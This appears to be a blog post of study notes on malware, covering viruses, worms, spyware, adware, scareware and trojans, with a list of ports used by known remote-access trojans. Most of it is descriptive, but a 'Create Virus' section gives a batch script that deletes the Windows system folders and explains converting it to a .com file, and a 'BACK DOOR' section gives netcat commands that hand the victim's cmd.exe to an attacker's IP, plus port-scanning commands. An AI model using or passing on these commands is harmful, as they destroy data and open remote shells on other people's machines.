N I L A D I C پنجشنبه 16 شهریور 1396 01:07 ب.ظ نظرات ()
In this chapter, we will talk a little bit about malwares and malware's type.

What is MALWARE?
Malicious software ( softwares to malicious and disruptive actions ... perform actions without consent )
Software in this class was able to infect, disrupt, disable, and in some cases corrupt, software, including the operating system, steal info

*** Malware types:
    - Viruses
    - Worms
    - Trojan horses
    - Rootkits
    - Spywares
    - Adware
# Viruses:
self-replicating and attach itself to other executable applications
    - what can do?
    ¦ Altering data
    ¦ Infecting other programs
    ¦ Replicating
    ¦ Encrypting itself
    ¦ Transforming itself into another form
    ¦ Altering configuration settings
    ¦ Destroying data
    ¦ Corrupting or destroying hardware

* some viruses:
- Wabbit viruses: 1970 can replicating over and over until system crashed
- first logic bomb in 1987 ... Jerusalem    .... was designed to cause damage only on a certain date
- polymorphic viruses first in 1992 ... way to detect early
- metamorphic ... completely rewrite themselves on each infection

* kinds of viruses:
- system boot sector viruses:
infect and place its own code into MBR(master boot record) of a system ... virus or other code can be run before the system itself
    -- problems:
    startup problems, problems with retrieving data, computer performance instability, and the inability to locate hard drives
- macro viruses:
in apps like excel and word we have macros that are designed to automate functions and create net process
macros are easy to abuse
    -- problems:
    once macro is run it can do all sort of things such as change a system configuration to decrease security
    or read a user’s address book and e-mail itself to others

- cluster viruses:
This virus alters the file-allocation tables on a storage device and when a user runs a given application
the virus runs before the system executes the actual file
### NOTE: Drive repairs are not useful for this type and even can destroy sections of drive

- encryption viruses:
they can avoid detection
This virus changes its program code, making it nearly impossible to
detect using normal means. It uses an encryption algorithm to encrypt and decrypt the
virus multiple times as it replicates and infects. Each time the infection process occurs,
a new encryption sequence takes place with different settings, making it difficult for
antivirus software to detect the problem

-- stealth
-- file-overwriting viruses:
like Stealth but hide in a host file without changing the host file’s

-- Sparse-infector viruses:
avoid detection by carrying out their infectious actions only
periodic, such as on every 10th or 25th activation

-- companion viruses:
compromises a feature of OSs that enables software
with the same name, but different extensions, to operate with different priorities

-- logic bomb:
Logic bombs have been notoriously difficult to detect because they
do not look harmful until they are activated

-- multipartite viruses
-- shell viruses: have subroutines that run after virus in shell
-- crypto viruses:
hunt for files or certain types of data on a system and then encrypt it
and the victim for unlocking the app should contact with virus creator and pay for key

***** Create Virus:
format windows:
    @echo off
    Del c:\windows\system32\*.*
    Del c:\windows\*.*
save with name.bat and convert to com file  " use bat2com to convert name.bat into name.com "

or we can use JPS virus maker for creating simple viruses...

# Worm:

Worms effectively use the power of networks, malware, and speed to spread very dangerous and effective pieces of malware

- worms common features:
¦ Do not require a host application to perform their activities
¦ Do not necessarily require any user interaction, direct or otherwise, to function
¦ Replicate extremely rapidly across networks and hosts
¦ Consume bandwidth and resources

# Spyware:
designed to collect and forward information regarding a victim’s activities to an interested party

- How Spywares Will infection:
    . peer-to-peer networks : there are more individual that uses systems
    . Instant Messaging: can use easily to share and send viruses
    . Internet Relay Chat
    . e-mail attachments
    . physical access
    . browser defects(bugs)
    . download freeware
    . websites
# Adware:
it displays ads, pop-ups, and may even change the start page of the browser

# Scareware:
scaring people from something that is in their system and make them buy the utility to clean that and use credit cards ...

# Trojans:
Trojan is a software application that is designed to provide covert access to
a victim’s system

- what Trojans can do?
    ¦ The CD drawer of a computer opens and closes.
    ¦ The computer screen changes, either flipping or inverting.
    ¦ Screen settings change by themselves.
    ¦ Documents print with no explanation.
    ¦ The browser is redirected to a strange or unknown web page.
    ¦ The Windows color settings change.
    ¦ Screen saver settings change.
    ¦ The right and left mouse buttons reverse their functions.
    ¦ The mouse pointer disappears.
    ¦ The mouse pointer moves in unexplained ways.
    ¦ The Start button disappears.
    ¦ Chat boxes appear on the infected system.
    ¦ The Internet service provider (ISP) reports that the victim’s computer is running port scans.
    ¦ People chatting with you appear to know detailed personal information.
    ¦ The system shuts down by itself.
    ¦ The taskbar disappears.
    ¦ Account passwords are changed.
    ¦ Legitimate accounts are accessed without authorization.
    ¦ Unknown purchase statements appear in credit card bills.
    ¦ Modems dial and connect to the Internet by themselves.
    ¦ Ctrl+Alt+Del stops working.
    ¦ When the computer is rebooted, a message states that other users are still connected.
- what can do by a hacker on target?
    ¦ Stealing data
    ¦ Installing software
    ¦ Downloading or uploading files
    ¦ Modifying files
    ¦ Installing keyloggers
    ¦ Viewing the system user’s screen
    ¦ Consuming computer storage space
    ¦ Crashing the victim’s system
- mechanism:
trojans use 2 channel .. one OVERT and one COVERT
overt for send info for other actions
covert for transmit info

* type of Trojans:
    ¦ Remote access Trojans (RATs) — Designed to give an attacker remote control over a
    victim’s system. Two well-known members of this class are SubSeven  Back Orifice
    ¦ Data sending — Keyloggers are common Trojans of this type.
    ¦ Destructive — This type of Trojan seeks to corrupt, erase, or destroy data outright on a system.
    ¦ Proxy — Malware of this type causes a system to be used as a proxy by the attacker.
    ¦ FTP — designed to set up the infected system as an FTP server
    ¦ Security software disablers
 some of them uses the special port and we can detect them
¦ Back Orifice: UDP 31337 or 31338
¦ Back Orifice 2000: TCP/UDP 54320/54321
¦ Beast: TCP 6666
¦ Citrix ICA: TCP/UDP 1494
¦ Deep Throat: UDP 2140 and 3150
¦ Desktop Control: UDP NA
¦ Donald Dick: TCP TCP 23476/23477
¦ Loki: Internet Control Message Protocol (ICMP)
¦ NetBus: TCP 12345 and 12346
¦ Netcat: TCP/UDP (any)
¦ NetMeeting Remote: TCP 49608/49609
¦ pcAnywhere: TCP 5631/5632/65301
¦ Reachout: TCP 43188
¦ Remotely Anywhere: TCP 2000/2001
¦ Remote: TCP/UDP 135-1139
¦ Whack-a-Mole: TCP 12361 and 12362
¦ NetBus 2 Pro: TCP 20034
¦ GirlFriend: TCP 21544
¦ Masters Paradise: TCP 3129, 40421, 40422, 40423, and 40426
¦ Timbuktu: TCP/UDP 407
¦ VNC: TCP/UDP 5800/5801

* how do that?
NETSTAT ... its windows tool
netstat –an

or we can use a sniffer

***** BACK DOOR:

nc -n -v -l -p 80   /// from attacker system
nc -n hackers_ip 80 -e "cmd.exe"   ///from victim sys

/// nc port scan:
    nc -v -z -w1 IPaddress <start port> - <ending port>
    Nc -l -p [port] ///// simple listenin tcp port  .... with -u we can use udp port

Nc –d  /// detach(joda kardan) nc from console
Nc -e [program] /// Redirects stdin/stdout from a program
Program | nc   //// program output to nc
Nc | program //// ncoutput to program
Nc -z   ////// used for port scanning